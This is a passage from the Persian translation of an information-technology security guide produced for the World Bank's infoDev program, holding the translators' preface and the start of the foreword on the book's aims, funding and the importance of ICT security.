ﭼﻨﺪﺍﻥ ﻣﻲﮐﻨﺪ .ﺁﺧﺮﻳﻦ ﺁﻣﺎﺭﻫﺎﻱ ﺟﻬﺎﻧﻲ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺩﻭﻟﺘﻲ ﻭ ﺗﺠﺎﺭﻱ ﻛﻪ ﺗﻮﺳـﻂ ﻭﻳـﺮﻭﺱ ،ﻛـﺮﻡ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ
ﺳﺮﻭﻳﺲ ﺑﻮﻗﻮﻉ ﭘﻴﻮﺳﺘﻪ ،ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻪ ﺧﻮﺑﻲ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﺪ .ﻃﺒﻖ ﺗﺨﻤﻴﻦ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ
)ﮐﻪ ﺑﻌﻨﻮﺍﻥ ﭘﻴﺸﺮﻭ ﺩﺭ ﺣﻮﺯﺓ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ،ﺗﻨﻬـﺎ ﺩﺭ ﺳـﺎﻝ ۲۰۰۳ﺿـﺮﺭﻫﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ ﺧﺪﺷـﻪﺩﺍﺭ ﺷـﺪﻥ ﺍﻣﻨﻴـﺖ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻟﻎ ﺑﺮ ۱۰ﻣﻴﻠﻴﺎﺭﺩ ﺩﻻﺭ ﺑﺮﺁﻭﺭﺩ ﺷﺪﻩ ﺍﺳﺖ.
ﺑﺎ ﺍﻳﻦ ﺍﻭﺻﺎﻑ ،ﺗﺪﻭﻳﻦ ﻭ ﺍﺟﺮﺍﻱ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻗﺒﺎﻝ ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﮔﺴﺘﺮﺩﻩ ،ﺿﺮﻭﺭﺗﻲ ﺍﺟﺘﻨﺎﺏ ﻧﺎﭘـﺬﻳﺮ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻣﺤـﺴﻮﺏ
ﻣﻲﺷﻮﺩ .ﺗﺪﺍﺑﻴﺮ ﻣﻨﺎﺳﺐ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﻨﺪ ،ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﻣﻴﺰﺍﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺭﺍ ﺩﺭ ﺣـﺪ
ﺑﺴﻴﺎﺭ ﻧﺎﭼﻴﺰﻱ ﻧﮕﻪ ﺩﺍﺭﻧﺪ ،ﻭ ﻗﺎﺑﻠﻴﺖ ﻭﺍﮐﻨﺶ ﺳﺮﻳﻊ ﻭ ﻣﺆﺛﺮ ﺑﻮﺟﻮﺩ ﺁﻭﺭﻧﺪ ﺗﺎ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺗﻬﺎ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﺯ ﭘـﻴﺶ ﺗﻌﻴـﻴﻦ-
ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻨﺪ ﺗﺎ ﺑﻬﺮﻩﻭﺭﻱ ﻭ ﺍﻳﻤﻨﻲ ﺍﻃﻼﻋﺎﺕ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ ﻭ ﮐﺴﺐ ﻭ ﮐﺎﺭ ﺑﺎ ﺧﻴﺎﻟﻲ ﺁﺳﻮﺩﻩﺗﺮ ﺗﺪﺍﻭﻡ ﻳﺎﺑﺪ.
"ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ" ﭘﺲ ﺍﺯ ﺩﺭﮎ ﺿﺮﻭﺭﺕ ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ،ﺑﻪ ﺳﻔﺎﺭﺵ ﺑﺎﻧﮏ ﺟﻬـﺎﻧﻲ ﻭ ﺗﻮﺳـﻂ ﮔـﺮﻭﻩ
) infoDevﻳﮑﻲ ﺍﺯ ﺯﻳﺮﻣﺠﻤﻮﻋﻪﻫﺎﻱ ﺑﺎﻧﮏ ﺟﻬﺎﻧﻲ( ﻭ ﺑﻪ ﻋﻨﻮﺍﻥ ﺗﻼﺷﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﮐـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﺩﺭ
ﺍﻳﻦ ﻧﻬﺎﺩ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺗﺪﻭﻳﻦ ﻭ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦﺑﺎﺭ ﺩﺭ ﺍﺟﻼﺱ ﻧﺨﺴﺖ ﺳﺮﺍﻥ ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ) (WSISﺩﺭ ﺳـﻮﺋﻴﺲ ،ﺩﺭ ﺩﺳـﺎﻣﺒﺮ ﺳـﺎﻝ ۲۰۰۳
ﻣﻴﺎﻥ ﺷﺮﮐﺖﮐﻨﻨﺪﮔﺎﻥ ﺗﻮﺯﻳﻊ ﺷﺪ .ﻣﺤﺘﻮﻳﺎﺕ ﺍﻳﻦ ﮐﺘﺎﺏ ﺣﺎﺻﻞ ﺑﺮﺭﺳﻲ ﮐﺘﺎﺑﻬـﺎ ،ﻣﻘـﺎﻻﺕ ،ﺭﺳـﺎﻟﻪﻫـﺎ ،ﻭ ﻣـﺴﺘﻨﺪﺍﺕ ﺗﺨﺼـﺼﻲ ﺯﻳـﺎﺩﻱ ﺍﺯ
ﮐﺎﺭﺷﻨﺎﺳﺎﻥ ﻭ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻳﻦ ﺣﻮﺯﻩ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺍﺳﺖ .ﻓﻬﺮﺳﺖ ﮐﺎﻣﻠﻲ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﺟـﻊ ﺩﺭ ﺑﺨـﺶ ﺷـﺸﻢ )ﭘﻴﻮﺳـﺘﻬﺎ( ﺁﻣـﺪﻩ ﺍﺳـﺖ ﮐـﻪ
ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﺤﺘﺮﻡ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺯ ﺁﺧﺮﻳﻦ ﻧﮑﺎﺕ ﻭ ﻣﻮﺿﻮﻋﺎﺕ ﻧﻴﺰ ﺁﮔﺎﻫﻲ ﻳﺎﺑﻨﺪ.
١٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﮐﺘﺎﺏ ﺣﺎﺿﺮ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﮑﻪ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻌﺎﺭﻳﻒ ﻭ ﺭﺍﻫﮑﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺖ ﻋﻤﻮﻣﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﮐﺮﺩﻩ ،ﺟﻨﺒﻪﻫﺎﻱ ﻓﻨﻲ ﻣﺪﻳﺮﻳﺘﻲ ﺁﻧﻬﺎ ﺭﺍ ﻧﻴﺰ
ﻣﺪﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ ﻭ ﺩﺭ ﻣﺘﻦ ﺍﻭﻟﻴﻪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﺮﺟﻤﺔ ﺁﻥ ﺗﻼﺵ ﺷﺪﻩ ﺗﺎ ﺣﺪ ﺍﻣﮑﺎﻥ ﻣﻄﺎﻟﺐ ﺑﮕﻮﻧﻪﺍﻱ ﻋﻨﻮﺍﻥ ﺷﻮﻧﺪ ﮐـﻪ ﻓﻬـﻢ ﻭ ﺩﺭﮎ
ﺁﻧﻬﺎ ﻧﻴﺎﺯ ﺑﻪ ﺩﺍﻧﺶ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﮐﺎﺭ ﺟﺎﻣﻌﺔ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺍﺯ ﮐﺎﺭﺑﺮﺍﻥ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ )ﺧﺼﻮﺻﹰﺎ ﻣـﺪﻳﺮﺍﻥ(
ﺑﻴﺎﻳﺪ ،ﻭ ﻟﺬﺍ ﻣﻲﺗﻮﺍﻥ ﺳﺮﻓﺼﻠﻬﺎﻳﻲ ﺍﺯ ﺁﻧﺮﺍ ﺩﺭ ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ ﺩﻭﺭﻩﻫﺎﻱ ﮐﻮﺗﺎﻩﻣﺪﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ.
ﺩﺭ ﺳﻄﺢ ﺟﻬﺎﻧﻲ ،ﮐﺘﺎﺑﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻨﺘﺸﺮ ﻭ ﺑﺘـﺎﺯﮔﻲ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺗﻮﺳـﻂ
ﻣﺘﺮﺟﻤﺎﻥ ﺑﺎﺗﺠﺮﺑﻪ ﻭ ﻳﺎ ﺟﻮﺍﻥ ﺑﻪ ﻓﺎﺭﺳﻲ ﺗﺮﺟﻤﻪ ﺷﺪﻩ ،ﺍﻣﺎ ﻣﻌﻤﻮ ﹰ
ﻻ ﭼﻮﻥ ﺑﻪ ﻣﻮﺿﻮﻋﻲ ﺗﺨﺼﺼﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﭘﺮﺩﺍﺧﺘـﻪﺍﻧـﺪ ،ﻓﺎﻗـﺪ ﻧﮕـﺎﻩ
ﮐﻼﻥ ﻭ ﻣﺪﻳﺮﻳﺘﻲ ﺑﻪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻨﺪ .ﮐﺘﺎﺑﻲ ﮐﻪ ﭘﻴﺶ ﺭﻭﻱ ﺷﻤﺎ ﺍﺳﺖ ،ﺑﺎ ﻧﮕﺎﻩ ﮐﻼﻥ ﺑﻪ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ،ﮐﻮﺷﻴﺪﻩ ﻣﻔﺎﻫﻴﻢ ﻣﻄـﺮﺡ ﺩﺭ
ﻫﺮﻳﮏ ﺍﺯ ﺣﻮﺯﻩﻫﺎﻱ ﺁﻧﺮﺍ ﺷﺮﺡ ﺩﻫﺪ ،ﻭ ﺁﻧﺠﺎ ﮐﻪ ﻻﺯﻡ ﺑﻮﺩﻩ ﺍﺯ ﺑﺮﺭﺳﻲ ﺟﻨﺒﻪﻫﺎﻱ ﻓﻨﻲ ﻧﻴﺰ ﻏﺎﻓﻞ ﻧﺸﺪﻩ ،ﻫﺮﭼﻨﺪ ﻫﻴﭽﮕﺎﻩ ﺁﻧﭽﻨﺎﻥ ﻭﺍﺭﺩ ﻣﺴﺎﺋﻞ
ﻓﻨﻲ ﻧﺸﺪﻩ ﮐﻪ ﮐﻼﻥﻧﮕﺮﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩ ﺑﺎﺷﺪ ،ﻭ ﺍﻳﻨﮑﺎﺭ ﺭﺍ ﺑﻪ ﮐﺘﺎﺑﻬﺎﻱ ﺗﺨﺼﺼﻲ ﺍﻣﻨﻴﺖ ﻭﺍﮔﺬﺍﺭ ﮐﺮﺩﻩ ﺍﺳﺖ.
ﻣﺘﺮﺟﻤﺎﻥ ﺍﻳﻦ ﺍﺛﺮ ﻫﻤﻮﺍﺭﻩ ﮐﻮﺷﻴﺪﻩﺍﻧﺪ ﺗﺎ ﺩﺭ ﺍﻧﺘﻘﺎﻝ ﻣﻔﺎﻫﻴﻢ ﻭ ﻧﮑﺎﺕ ﺍﻳﻦ ﮐﺘﺎﺏ ،ﺣﻔﻆ ﺍﻣﺎﻧﺖ ﻧﻤﺎﻳﻨﺪ ﻭ ﻫﻴﭽﮕﺎﻩ ﻣﻌﺎﻧﻲ ﺭﺍ ﻓـﺪﺍﻱ ﺍﻟﻔـﺎﻅ
ﻧﮑﺮﺩﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻭﺍﮊﻩﺳﺎﺯﻱ ﻳﺎ ﻣﻌﺎﺩﻝﺳﺎﺯﻱ ﻧﻤﻮﺩﻩﺍﻧﺪ ،ﮐﻪ ﮐﺎﺭﻱ ﻃﺎﻗﺖﻓﺮﺳﺎ ﻭ ﻣﺴﺌﻮﻟﻴﺖﺁﻭﺭ ﺍﺳﺖ .ﺳﺎﻳﺮ ﻋﻨـﺎﻭﻳﻨﻲ ﮐـﻪ ﺑـﺮﺍﻱ
ﺁﻧﻬﺎ ﻣﻌﺎﺩﻝ ﻓﺎﺭﺳﻲ ﻳﺎﻓﺘﻪ ﻭ ﻳﺎ ﺳﺎﺧﺘﻪ ﻧـﺸﺪﻩ ﻧﻴـﺰ ﺑـﺼﻮﺭﺕ ﺍﺻـﻠﻲ ﺩﺭ ﺗﺮﺟﻤـﻪ ﺗﮑـﺮﺍﺭ ﺷـﺪﻩﺍﻧـﺪ .ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﻣﺤﺘـﺮﻡ ﺍﻋـﻢ ﺍﺯ
ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ،ﺍﺳﺎﺗﻴﺪ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ،ﻭ ﻋﻼﻗﻪﻣﻨﺪﺍﻥ ﺑﺎ ﺍﺭﺍﺋﻪ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻭ ﺍﻧﺘﻘﺎﺩﺍﺕ ﺧﻮﺩ ﻣﺎ ﺭﺍ ﺩﺭ ﺭﻓـﻊ ﻟﻐﺰﺷـﻬﺎ ﻭ ﮐﺎﺳـﺘﻴﻬﺎﻱ ﺍﺣﺘﻤـﺎﻟﻲ ﺍﻳـﻦ
ﮐﺘﺎﺏ ﺁﮔﺎﻩ ﺳﺎﺯﻧﺪ ﺗﺎ ﺩﺭ ﺻﺪﺩ ﺭﻓﻊ ﺁﻧﻬﺎ ﺑﺮﺁﻳﻴﻢ.
ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﺩﺭﮔﻤﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﮐﻪ ﺑﻪ ﺗﺎﺯﮔﻲ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻋﻼﻗﻪﻣﻨﺪ ﺷﺪﻩﺍﻧﺪ ﻭ ﻫﻨﻮﺯ ﺑﺎ ﺍﺻﻄﻼﺣﺎﺕ ﺍﻣﻨﻴﺘـﻲ
ﻭ ﻣﻌﺎﺩﻟﻬﺎﻱ ﺭﺍﻳﺞ ﺁﻧﻬﺎ ﺁﺷﻨﺎﻳﻲ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺭﻧﺪ ،ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﮐﺘﺎﺏ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ ﮐﻪ ﺩﺭ ﮐﺘﺎﺏ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ
ﻲ ﺑﮑﺎﺭﺭﻓﺘﻪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﺻﻔﺤﻪﺁﺭﺍﻳﻲ ﮐﺘﺎﺏ ﻧﻴﺰ ﺍﺯ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﮐﺘﺎﺏ ﺍﻟﮕﻮﺑﺮﺩﺍﺭﻱ ﺷـﺪﻩ ﻭ ﺟـﺰ
ﺷﺪﻩ ﻭ ﻧﻴﺰ ﻣﻌﺎﺩﻝ ﻓﺎﺭﺳ ﹺ
ﺑﺨﺶ ﭘﻨﺠﻢ -ﮐﻪ ﺑﺪﻟﻴﻞ ﻭﺟﻮﺩ ﻣﺘﻮﻥ ﻓﻨﻲ ﻭ ﻣﺘﻦﺑﺮﻧﺎﻣﻪ ﺯﻳﺎﺩ ،ﺍﺯ ﺗﻤﺎﻡ ﻓﻀﺎﻱ ﺻﻔﺤﻪ ﺑﺮﺍﻱ ﻣﺘﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ -ﺩﺭ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎ ﺍﺯ
ﺻﻔﺤﻪﺁﺭﺍﻳﻲ ﺩﻭﺳﺘﻮﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ.
ﺩﺭ ﭘﺎﻳﺎﻥ ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﺍﺯ ﺧﺎﻧﻢ ﻣﺮﻳﻢ ﺍﻓﺘﺨﺎﺭﻱ ﻭ ﺁﻗﺎﻳﺎﻥ ﻣﺤﻤﺪﻣﻬﺪﻱ ﺟﺎﻗﻮﺭﻱ ،ﺍﻓﺸﻴﻦ ﻻﻣﻌﻲ ،ﻭ ﻧﻴﻤﺎ ﻟﻄﻔﻲ ﮐـﻪ ﺩﺭ ﺗﻬﻴـﺔ
ﺍﻳﻦ ﺍﺛﺮ ﻣﺘﺤﻤﻞ ﺯﺣﻤﺎﺗﻲ ﺷﺪﻧﺪ ،ﮐﻠﻴﺔ ﺍﺳﺎﺗﻴﺪ ﻭ ﺻﺎﺣﺒﻨﻈﺮﺍﻧﻲ ﮐﻪ ﺑﺎ ﺍﺭﺍﺋﻪ ﻧﻈﺮﺍﺕ ﮐﺎﺭﺷﻨﺎﺳﻲ ﻭ ﺭﺍﻫﮕـﺸﺎﻱ ﺧـﻮﺩ ﺑـﻪ ﻣـﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﮑـﺎﺭ
ﺩﻟﮕﺮﻣﻲ ﺩﺍﺩﻧﺪ ،ﮐﻠﻴﺔ ﻫﻤﮑﺎﺭﺍﻧﻲ ﮐﻪ ﺑﻪ ﻧﻮﻋﻲ ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺗﻨﻈﻴﻢ ﺍﻳﻦ ﺍﺛﺮ ﻧﻘﺶ ﺩﺍﺷﺘﻨﺪ ،ﻭ ﻧﻴﺰ ﺩﺑﻴﺮﺧﺎﻧﺔ ﺷـﻮﺭﺍﻱ ﻋـﺎﻟﻲ ﺍﻃـﻼﻉﺭﺳـﺎﻧﻲ ﮐـﻪ
ﺯﺣﻤﺖ ﭼﺎﭖ ﻭ ﻧﺸﺮ ﺍﻳﻦ ﮐﺘﺎﺏ ﺭﺍ ﻋﻬﺪﻩﺩﺍﺭ ﺷﺪ ﺻﻤﻴﻤﺎﻧﻪ ﺗﺸﮑﺮ ﻧﻤﺎﻳﻴﻢ.
ﺍﻣﻴﺪ ﺁﻧﮑﻪ ﺍﻳﻦ ﻣﮑﺘﻮﺏ ﺑﺘﻮﺍﻧﺪ ﺍﺛﺮﻱ ﻫﺮﭼﻨﺪ ﺟﺰﺋﻲ ﺩﺭ ﺳﻴﺮ ﭘﻴﺸﺮﻓﺖ ﻭ ﺗﻮﺳﻌﺔ ﮐﺸﻮﺭ ﺩﺭ ﻣﺴﻴﺮ ﻧﻴﻞ ﺑﻪ ﺍﻳﺮﺍﻧﻲ ﺁﺑﺎﺩ ،ﺁﺯﺍﺩ ﻭ ﺳﺮﻓﺮﺍﺯ ﻣﺆﺛﺮ ﺍﻓﺘﺪ.
ﮔﺮﻭﻩ ﻣﺘﺮﺟﻤﻴﻦ
ﺗﺎﺑﺴﺘﺎﻥ ۱۳۸۴
ﺩﻳﺒﺎﭼﻪ
ﻛﻠﻴﺔ ﺍﻋﺘﺒﺎﺭﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺗﻬﻴﻪ ﻭ ﺗﺪﻭﻳﻦ ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﺍﺯ ﻃﺮﺡ infoDevﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ١ﺗﺄﻣﻴﻦ ﺷﺪﻩ ﺍﺳﺖ .ﻃﻲ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ
ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢ﺑﻪ ﺍﻫﻤﻴﺘﻲ ﻭﻳﮋﻩ ﺩﺳﺖ ﻳﺎﻓﺘﻪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﮔﺮﻭﻩ ﻣﺸﺎﻭﺭﺓ ﻓﻨـﻲ ٣infoDevﻭﺍﻗـﻊ ﺷـﺪﻩ
ﺍﺳﺖ .ﺩﺭ ﺍﻳﻨﺠﺎ ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﻣﺮﺍﺗﺐ ﺗﺸﻜﺮ ﻭ ﺍﻣﺘﻨﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺩﻟﻴﻞ ﺑﺬﻝ ﺗﻮﺟﻪ ﺩﺑﻴﺮﺧﺎﻧـﺔ ﺍﻳـﺎﻟﺘﻲ ﺍﻣـﻮﺭ ﺍﻗﺘـﺼﺎﺩﻱ ﺳـﻮﺋﻴﺲ
) ٤(SECOﻧﻪﺗﻨﻬﺎ ﺑﺨﺎﻃﺮ ﺗﺄﻣﻴﻦ ﺍﻋﺘﺒﺎﺭ ﺍﻳﻦ ﭘﺮﻭﮊﻩ ،ﺑﻠﻜﻪ ﺑﺨﺎﻃﺮ ﺩﺭﻙ ﻓﻮﺭﻳﺖ ﻣﺴﺌﻠﻪ ﻭ ﺑﻪ ﺛﻤﺮ ﺭﺳﺎﻧﺪﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻋﻼﻡ ﻧﻤﺎﺋﻴﻢ.
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ) ٥(ICTﻧﻘﺶ ﻣﻬﻤﻲ ﺩﺭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﺍﻳﻔﺎ ﻣﻲﻛﻨﺪ ،ﻭﻟﻲ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻧﻴﺰ ﻧﺒﺎﻳﺪ ﺍﺯ ﻧﻈـﺮ
ﺩﻭﺭ ﺩﺍﺷﺖ ﻛﻪ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻧﺎﺍﻣﻦ ﻭ ﻏﻴﺮ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ،ﺍﺳﺘﻔﺎﺩﺓ ﻣﺆﺛﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﺎﺷﺪﻧﻲ ﺍﺳﺖ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴـﺖ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﺍﻱ ﻧﻘﺸﻲ ﺍﺳﺎﺳﻲ ﻭ ﺗﻌﻴﻴﻦﻛﻨﻨﺪﻩ ﺩﺭ ﺍﻳﺠﺎﺩ ﺷﺮﺍﻳﻂ ﻻﺯﻡ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻮﻓﻖ ﻃﺮﺡﻫﺎﻱ ﻣﻠﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻭ ﺍﺟﺮﺍﻱ ﭘﺮﻭﮊﻩﻫﺎﻳﻲ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﺁﻣـﻮﺯﺵ ﻭ ﭘـﺮﻭﺭﺵ ،ﺑﻬﺪﺍﺷـﺖ ﻳـﺎ ﺍﻣـﻮﺭ ﻣـﺎﻟﻲ ﻭ
ﺍﻋﺘﺒﺎﺭﻱ ﺍﺳﺖ.
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺿﻮﻉ ﭘﻴﭽﻴﺪﻩﺍﻱ ﺍﺳﺖ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﮕﺎﻡ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺣﺎﻝ ﺗﻜﻮﻳﻦ ﺍﺳﺖ .ﻣﺆﻟﻔﻴﻦ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺍﻧﺴﺘﻪ-
ﺍﻧﺪ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺭﺍ -ﻣﺴﺘﻘﻞ ﺍﺯ ﻓﻨﺎﻭﺭﻱ -ﺑﺮﺍﻱ ﻣﺤﻴﻂﻫﺎﻱ ﻭﻳﮋﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪ .ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻫﻤﭽﻨـﻴﻦ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ www.infodev-security.netﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪﺭﻭﺯ ﻭ ﻣﻨﺎﺳﺐ ﺩﺳﺖ ﻳﺎﺑﻨـﺪ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳـﻦ ﺟﺮﻳـﺎﻥ
ﻲ ﺛﺎﺑــﺖ ،ﺍﺯ ﭘﻴــﺸﺮﻓﺖﻫــﺎﻱ ﺟﺪﻳــﺪ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺑــﺎﺧﺒﺮ ﺷــﻮﻧﺪ .ﺑــﺎ ﺗﻮﺟــﻪ ﺑــﻪ ﺍﻳﻨﻜــﻪ ﻣﻄﺎﻟــﺐ
ﺍﻃــﻼﻉﺭﺳــﺎﻧ ﹺ
